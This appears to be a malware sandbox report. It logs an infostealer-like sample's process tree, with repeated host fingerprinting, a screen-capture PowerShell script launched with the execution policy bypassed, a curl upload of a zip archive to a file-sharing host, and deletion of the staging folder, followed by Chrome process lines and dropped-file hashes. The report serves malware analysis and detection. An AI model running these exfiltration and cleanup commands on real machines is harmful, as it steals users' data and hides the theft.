C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"2⤵PID:3204
-
C:\Windows\system32\getmac.exegetmac /NH3⤵PID:3112
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3436
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2348
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2044
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1172
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1164
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2012
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1680
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1156
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2340
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3652
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2104
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4968
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4028
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3580 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1784
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1932
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3404
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:948
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1028
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""2⤵PID:1012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Spdohfma.zip";"2⤵PID:2088
-
C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Spdohfma.zip";3⤵PID:3204
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4172
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2748
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3084
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2900
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:908
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3908
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2524
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3940 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4080
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4348
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1784
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:952
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4884
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2424
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4724
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3148 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:3372
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4136
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:860
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3212
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:464
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""2⤵PID:4492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2824
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3624 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:588
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3908
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2040
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3024
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3012
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1848
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1628
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1932
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4404
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4364
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1548
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2536
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3596
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4904
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2844
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4572
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4816
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1492
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 2f21a2953ac6229e434d4beaa677384b 1ajPKFnEw0CG6MkFLIcXBA.0.1.0.0.01⤵PID:3480
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3580
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4512 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff7a5dab58,0x7fff7a5dab68,0x7fff7a5dab782⤵PID:524
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:22⤵PID:1712
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:82⤵PID:4180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2248 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:82⤵PID:1568
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:12⤵PID:1536
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:12⤵PID:3828
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:12⤵PID:2784
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4556 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:82⤵PID:220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:82⤵PID:3884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:82⤵PID:2484
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4872 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:82⤵PID:2880
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:82⤵PID:2864
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4576 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:12⤵PID:1916
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2608 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3580 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1832 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:12⤵PID:3924
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3164 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:12⤵PID:4604
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:1916
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f83850b89878ad82b35f7c37ef3055a0
SHA1cbe1445eb4a6e01d5342292abb3e107a04459233
SHA256581c12a2e96e4b74543b77773465549271c62b93b97cdf66cba78c41e485246f
SHA5125cecc4a820427b40934b6cb212452d3fc21be17aefd51195d5c3fcfcccd869906a1756601526257a83ce4d1339430308f8c7abb5ef85e980c267d517272fb659
-
Filesize
2KB
MD5930a2f210a12309c41589772bae08914
SHA18a81ef7286cf2d9eeb03907d859885e05a8ece47
SHA256ccff633a967f5a9ae6c66ef569718f9983b385698d4f05d2290cc343e2303338
SHA5126ecab3384bfa26fcdd4e66365a51a63a6981e4e601075ce0f04475a54ac41892518ce4c58b53f2396a9e180415bdc552f7f6d6c1b49a9870966ddefe3fff06b4
-
Filesize
94B
MD52f308e49fe62fbc51aa7a9b987a630fe
SHA11b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024
-
Filesize
70B
MD58a0ed121ee275936bf62b33f840db290
SHA1898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA5127d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154
-
Filesize
15B
MD5675951f6d9d75fd2c9c06b5ff547c6fd
SHA19b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA25660fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA51244dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea
-
Filesize
78B
MD5c5e74f3120dbbd446a527e785dfe6d66
SHA111997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f
-
Filesize
429KB
MD557b2f9ef5faeb3e64cb67fe92441a87e
SHA1b7b73e59770110c202415273a4958acb12b6cdd7
SHA256902cbe3c2100584f40d65b47fc73922333544af04d4cadcd826e079681b4ac40
SHA5123f58cd7e2590dbc1c719450c8c8014dc87c6e3cf6b814dc1b062a80480761547fa16f5bd04675ca01fcf6737c7846e2617b9dee2d2308ae88abf1f311732535c
-
Filesize
506B
MD51c3984c932fa850617b78b665cf8e9e2
SHA154f79dddbc6d24c65860b717a33194d96b7203b7
SHA2564b69ed6f9252f03f188c90944b8106b444586a093d11a4546d694990b45fdc5d
SHA512c0147ff34846de3c880f69d411c3f1c0ff7db1e642b8f6e1d132a00139f51d39af071b4ff14be27ee749bc87671ea4cca6c1b96638ace74c451e3a4f8417a19d
-
Filesize
1KB
MD572ee8eab4951050080bbcda14c57c0a0
SHA11119713f73e6f0a1514cb1fcfd4883da55fb7268
SHA256141bb0c207e41f375d7d67fea097161dcbebfcad612054216b13887b523fca9d
SHA5125af81800d9a72827023832cfedeaa18dc6fd8c369cc914872b953144fdab6d25bd968298b2c065155cde897902fd147d46b57e12e3d26c31c9ab9f8be4b03f9a
-
Filesize
22B
MD576cdb2bad9582d23c1f6f4d868218d6c
SHA1b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA2568739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA5125e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f
-
Filesize
1KB
MD5d3b739de1f6ef672ff1862078b77fc74
SHA16fcbc1d4b53c94e23f16b4be320c5a91fb1c6521
SHA256157828e31fb5f21769014e59c2abb142667437cd8683b80142a5e021a772b0d9
SHA5120a108264bedc6ebdc8b9a364cf155aabcee8bbfe50b6a74df53bd47eff58abf0b6cb7e53102cce3c01d2edba87696c1eb2458a24e93865b438f539fb57755e7a
-
Filesize
3KB
MD5a8834c224450d76421d8e4a34b08691f
SHA173ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596
-
Filesize
146B
MD514a9867ec0265ebf974e440fcd67d837
SHA1ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA51236c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\26ed1aa8-7c85-4dfe-a4d6-b5ee35de56c2.tmp
Filesize7KB
MD501541add0f79f05b2adfd6cd7c0657f6
SHA19977cac8d851d2540774dae2a7f13a76e052d467
SHA25617ad3352c83ae7f144fd46888b5cd558fa0e9b3e810767241e88f78ccb1592b4
SHA512b7a6608cff2b2d5ee0e31a059cb46c9d4fac8496e2ca250fcca9eff9720f8a24b944ab1ddd23d2684e955f3cebf24881e622d0ebe22ea1c4a73bc584bfc0e49c
-
Filesize
206KB
MD5f998b8f6765b4c57936ada0bb2eb4a5a
SHA113fb29dc0968838653b8414a125c124023c001df
SHA256374db366966d7b48782f352c78a0b3670ffec33ed046d931415034d6f93dcfef
SHA512d340ae61467332f99e4606ef022ff71c9495b9d138a40cc7c58b3206be0d080b25f4e877a811a55f4320db9a7f52e39f88f1aa426ba79fc5e78fc73dacf8c716
-
Filesize
168B
MD57c1c9752e28861efa46d3984a50d5e46
SHA15c0e3949e26e3d36d4ba32c2994c9ca3056ce5e2
SHA256c9b1ad6e07b49bfd0a1d7b7e5fe5f80bc2930666ba94e227337c5c9fe85dd674
SHA5126e6eccf0c838523005a37adb938c3ed2b3b3c8af9eb54b113a46fe953a16a9b60f6cabab291b7de31167f123a815f810b5f82b2cf2375e7f582b347e86cbff51
-
Filesize
168B
MD57d6c810684ccd21bad80b3adf89b5dad
SHA174c3b8893d98ebcdf11c9eae4298218d8b9fdacf
SHA25612b17bd7ae9ae23515f5fd3b7317933e69db2497458b8ba66a79a296ebbec12d
SHA5121be32cffad67dd89501773107d06f273e149151885d7ec63372771b46b110ea69698ee57aaa414adcd12012629d9ba1227984919f1ebb52d1db346a8a9bbcb0c
-
Filesize
168B
MD5a8e03c8ebb0ecae5abf57b0286974adc
SHA148f9018ff2c69cd6d66e884449d3ac44d765ea4f
SHA256949a702177da5d204a957cb16c1c9e553e1aba7eeaba035654abdbb396a22e7a
SHA5129617ecded8137e49383529ddfa2a9f4b95b3292f5f3ca6f8de7ecc4c83574a1ac7663718810261da825be8d8bfd9a1bafc25fb3ed02baeeb2a947bd83847050d
-
Filesize
192B
MD5edc0902a0da5d868bce61dd13e738def
SHA1037635fbeb4bebfe0fec80345aa41f8107cb4032
SHA256c0eb3d6f0ffb07e70ccf1e07eae462c269afa47d1df544a83190b78873abeaff
SHA512a65157579d4586dd1d659532eb3396b9aff5ef50042daa8e7ad7fc79f745771cd0a475f322cc00aa0335d5b9c1187e33c9f6c559fdcaf1153e89cab095df2043
-
Filesize
2KB
MD5baab4d13053a32226b26c0449e235898
SHA1715c914da91bb83b56f508371fd42a2c7ca8723e
SHA256d572395ffeb17fbed93adb8a3eb9bd7aed9627cd87c7b2b1f936e7cde23cfc8b
SHA512b7c5dcbbe4ede3809a4c19cfa7bcd9798a70e333a86d006fd7df21e8ca7d37dbb13565a2f5fc5a24b42faeae2a1ed1a1a0194f75501668a941ddac24e1139683
-
Filesize
1KB
MD5b8457234fe5dfcc784997c16cd7d9f27
SHA1771092f1ddc87564db1b7216ad2babfc01b779b5
SHA25621a2822e2ee97e8d522c08c1db4cabb797a89c9d62b33155e2ff012943dc6719
SHA51206247df586b56241a6662a063806186ff61b295c1a8916d9be95a4daf6cfc5b8994f5030d148168f4b0c27e8d9a03af3ad85a180f8eece99fb50f07df9cb91a4
-
Filesize
2KB
MD55b174cc35abf367ecb8495adda9dadfb
SHA146e1ad7e168b1c1cb4f0bd8bc6572af7aa951363
